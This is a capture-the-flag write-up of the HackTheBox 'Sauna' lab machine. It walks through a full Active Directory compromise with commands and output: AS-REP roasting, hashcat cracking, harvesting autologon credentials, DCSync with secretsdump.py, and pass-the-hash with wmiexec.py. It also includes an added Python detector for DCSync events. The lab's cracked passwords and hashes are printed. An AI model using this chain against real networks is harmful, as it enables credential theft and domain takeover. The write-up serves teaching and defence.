HackTheBox - Sauna


Sauna was a fun 20 point box created by egotisticalSW. It starts with username enumeration from the company website, which lets you AS-REP roast an account that has Kerberos pre-authentication disabled, crack the resulting hash and log in over WinRM for user. From there you find autologon credentials for a service account that holds DCSync rights, which lets you pull the domain hashes with secretsdump.py, pass the Administrator hash and get root.

User.txt

Nmap


A quick nmap scan reveals the following ports:

# nmap -sT -p- --min-rate 5000 10.10.10.175

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack
80/tcp    open  http             syn-ack
88/tcp    open  kerberos-sec     syn-ack
135/tcp   open  msrpc            syn-ack
139/tcp   open  netbios-ssn      syn-ack
389/tcp   open  ldap             syn-ack
445/tcp   open  microsoft-ds     syn-ack
464/tcp   open  kpasswd5         syn-ack
593/tcp   open  http-rpc-epmap   syn-ack
636/tcp   open  ldapssl          syn-ack
3268/tcp  open  globalcatLDAP    syn-ack
3269/tcp  open  globalcatLDAPssl syn-ack
5985/tcp  open  wsman            syn-ack
9389/tcp  open  adws             syn-ack
49667/tcp open  unknown          syn-ack
49673/tcp open  unknown          syn-ack
49674/tcp open  unknown          syn-ack
49675/tcp open  unknown          syn-ack
49686/tcp open  unknown          syn-ack
52304/tcp open  unknown          syn-ack

Focusing on the more interesting ports (HTTP, LDAP and SMB) with version detection and default scripts:

# nmap -sV -sC -T4 10.10.10.175 -p 80,389,445

80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 
445/tcp open  microsoft-ds?
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h04m40s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-07-17T20:57:06
|_  start_date: N/A


SMB


A null session over SMB and anonymous RPC enumeration were both denied, so I moved on to the web application on port 80.


HTTP


Navigating to http://10.10.10.175/ you’re greeted with the following page:


Browsing the site, the About Us page caught my eye: it lists a handful of employee names, which are potential usernames for our enumeration.


I saved the usernames to a file, shown below:

# cat users 
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven Kerb


AD Naming Conventions


I first tried enumerating users and brute forcing with the raw first and last names from the site plus common password combinations, without success. I then came across an article on Active Directory naming conventions, i.e. how usernames are typically derived from a first and last name.

Based on this article I created a simple Python script to print out combinations of the names as described in the article.

import sys

# Read the "First Last" pairs from the file given on the command line.
with open(sys.argv[1]) as f1:
    names = f1.read().split()

# Walk the tokens two at a time: first name, then last name.
for fn, ln in zip(names[0::2], names[1::2]):
    print(fn + ln)           # FirstLast
    print(fn[0] + ln)        # FLast
    print(fn[:3] + ln[:3])   # FirLas

Running the script produces a wordlist covering three of the common Active Directory naming conventions. I didn't implement the last convention from the article (three random letters plus three random numbers), as that seemed excessive for a 20 point box.

# python3 adnames.py users 
FergusSmith
FSmith
FerSmi
ShaunCoins
SCoins
ShaCoi
HugoBear
HBear
HugBea
BowieTaylor
BTaylor
BowTay
SophieDriver
SDriver
SopDri
StevenKerb
SKerb
SteKer

Saving these to a file, we now have a list of potential usernames to enumerate services.


Kerberos


I used Impacket's GetNPUsers.py to AS-REP roast with the generated username list (saved as users). For every name that does not exist the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN, which is a username oracle in itself; the other 17 candidates are simply not in the domain. FSmith both exists and has "Do not require Kerberos preauthentication" set, so the KDC returns an AS-REP whose encrypted part is keyed from the user's password, and the script prints it in hashcat format. Note the 7-hour clock skew in the nmap output: this AS-REQ carries no encrypted timestamp, so it works regardless, but anything that later presents a Kerberos ticket to this DC needs the local clock within five minutes of the DC's.

# python3 GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile users -dc-ip 10.10.10.175 -request
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:a75c84cbc4b3e326eb1bac9a2c4b3a83$...
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Throwing the hash at hashcat (-m 18200 is Kerberos 5 AS-REP etype 23) with rockyou.txt gives a result within seconds:

# hashcat -a 0 -m 18200 hash /root/rockyou.txt 

Dictionary cache built:
* Filename..: /root/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:a75c84cbc4b3e326eb1bac9a2c4b3a83$...:Thestrokes23

The credentials are fsmith / Thestrokes23.


Flag


We can simply login with evil-winrm and type the user flag:

# evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith

*Evil-WinRM* PS C:\Users\FSmith> type desktop/user.txt
1b5520...



Root.txt

Enumeration


During enumeration I ran winPEAS.exe from PEASS (Privilege Escalation Awesome Scripts SUITE). It found autologon credentials for svc_loanmanager. These live in cleartext under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (DefaultUserName / DefaultPassword) and are readable by any local user, which is why they are a classic finding; the T1012 tag is ATT&CK's Query Registry technique:

  [+] Looking for AutoLogon credentials(T1012)                                             
    Some AutoLogon credentials were found!!                                                         
    DefaultDomainName             :  EGOTISTICALBANK                                       
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager                       
    DefaultPassword               :  Moneymakestheworldgoround!


BloodHound


The svc_loanmanager password failed over both SMB and WinRM. Rather than chase that, I uploaded the SharpHound ingestor and ran it as fsmith to see what the service account could actually do. (The logins failed because I had overlooked the account name: the autologon entry says svc_loanmanager, but the domain account is svc_loanmgr. BloodHound shows the correct name, so nothing lost.)

*Evil-WinRM* PS C:\Users\FSmith\Documents> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\FSmith\Documents> Invoke-BloodHound
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir

    Directory: C:\Users\FSmith\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/17/2020   3:33 PM           9110 20200717153342_BloodHound.zip
-a----        7/17/2020   3:31 PM         973397 SharpHound.ps1
-a----        7/17/2020   3:01 PM         244224 winPEAS.exe
-a----        7/17/2020   3:33 PM          11122 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin

I downloaded the 20200717153342_BloodHound.zip file to Kali and loaded it into BloodHound. As shown below, svc_loanmgr has the GetChanges and GetChangesAll edges to the domain object:


These are the extended rights on the domain object that DCSync abuses: a principal holding them can ask a domain controller to replicate directory data, password hashes included, exactly as another DC would:

The "Replicating Directory Changes" extended right
    CN: DS-Replication-Get-Changes
    GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
The "Replicating Directory Changes All" extended right
    CN: DS-Replication-Get-Changes-All
    GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
The "Replicating Directory Changes In Filtered Set" extended right (not always needed)
    CN: DS-Replication-Get-Changes-In-Filtered-Set
    GUID: 89e95b76-444d-4c62-991a-0facbeda640c

Since svc_loanmgr holds both GetChanges and GetChangesAll, we can DCSync with secretsdump.py, which speaks the DRSUAPI replication protocol over RPC and pulls the NTDS.DIT secrets without touching the disk or executing anything on the DC.
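On the defensive side this is one of the better-behaved attacks to catch: with the Directory Service Access audit subcategory enabled and an audit entry on the domain object covering these rights, each replication request produces Security event 4662 with AccessMask 0x100 (Control Access) and the GUIDs above in its Properties field, and the only principals that should ever generate it are domain controllers' machine accounts (plus any known sync agent). The following Python is added here and is not part of the original writeup; it runs that check over a few constructed 4662 records in the JSON-lines shape a log shipper would forward (the field names follow the Windows EventData names, the records themselves are made up to match this box's account names), and flags anyone outside the allow-list exercising a replication right.

```python
import json
import re

# The replication control-access rights the page lists; DCSync needs the first two.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
FULL_DCSYNC = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)
CONTROL_ACCESS = 0x100  # AccessMask bit meaning an extended/control-access right was exercised


def replication_rights(properties: str) -> set:
    """Names of the replication rights referenced in a 4662 Properties field."""
    return {REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties) if g.lower() in REPLICATION_RIGHTS}


def flag_dcsync(events, expected_replicators):
    """Return 4662 events where a principal outside `expected_replicators` used a replication right."""
    allow = {a.upper() for a in expected_replicators}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("OperationType") != "Object Access":
            continue
        if int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights or ev["SubjectUserName"].upper() in allow:
            continue
        hits.append({
            "time": ev["TimeCreated"],
            "account": f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}',
            "object": ev.get("ObjectName", ""),
            "rights": sorted(rights),
            "full_dcsync": FULL_DCSYNC <= rights,  # both rights needed to pull hashes
        })
    return hits


# Constructed sample records (not real logs from the box): a DC replicating legitimately,
# svc_loanmgr performing a DCSync, fsmith reading an ordinary property, and a logon event.
SAMPLE_EVENTS_JSONL = """
{"TimeCreated": "2020-07-17T21:10:03Z", "EventID": 4662, "OperationType": "Object Access", "SubjectUserName": "SAUNA$", "SubjectDomainName": "EGOTISTICALBANK", "ObjectName": "DC=EGOTISTICAL-BANK,DC=LOCAL", "AccessMask": "0x100", "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"TimeCreated": "2020-07-17T21:12:44Z", "EventID": 4662, "OperationType": "Object Access", "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICALBANK", "ObjectName": "DC=EGOTISTICAL-BANK,DC=LOCAL", "AccessMask": "0x100", "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"TimeCreated": "2020-07-17T21:12:50Z", "EventID": 4662, "OperationType": "Object Access", "SubjectUserName": "fsmith", "SubjectDomainName": "EGOTISTICALBANK", "ObjectName": "CN=FSmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL", "AccessMask": "0x10", "Properties": "%%7685 {bf967a86-0de6-11d0-a285-00aa003049e2}"}
{"TimeCreated": "2020-07-17T21:13:01Z", "EventID": 4624, "SubjectUserName": "fsmith", "SubjectDomainName": "EGOTISTICALBANK", "LogonType": "3"}
"""
SAMPLE_EVENTS = [json.loads(line) for line in SAMPLE_EVENTS_JSONL.strip().splitlines()]
DC_ACCOUNTS = {"SAUNA$"}  # assumption: the environment's domain controller machine accounts

if __name__ == "__main__":
    for hit in flag_dcsync(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f'{hit["time"]} {hit["account"]} {hit["rights"]} full_dcsync={hit["full_dcsync"]}')
```

Two caveats when deploying this: the allow-list must be maintained (a new DC or an Azure AD Connect account will otherwise page you), and without the audit entry on the domain object there is no 4662 to parse at all, so the first check in an environment is whether the event exists for a known-good DC replication.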


secretsdump.py


Running the script with -just-dc-ntlm (NTLM hashes only, pulled from NTDS over DRSUAPI rather than from a copy of the file) outputs the Administrator hash:

# python3 secretsdump.py -just-dc-ntlm EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password: Moneymakestheworldgoround!
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:a7689cc5799cdee8ace0c7c880b1efe3:::
[*] Cleaning up... 


Flag


Two things in the dump are worth a glance first: HSmith and FSmith have identical NT hashes, so they share a password (NT hashes are unsalted), and Guest's hash is that of an empty password, which is normal for the disabled default Guest account. As for Administrator, we never need the plaintext: wmiexec.py takes LM:NT for pass-the-hash, and we can read the root flag:

# python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff administrator@10.10.10.175 
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
egotisticalbank\administrator

C:\>cd users\administrator
C:\users\administrator>type desktop\root.txt
f3ee04...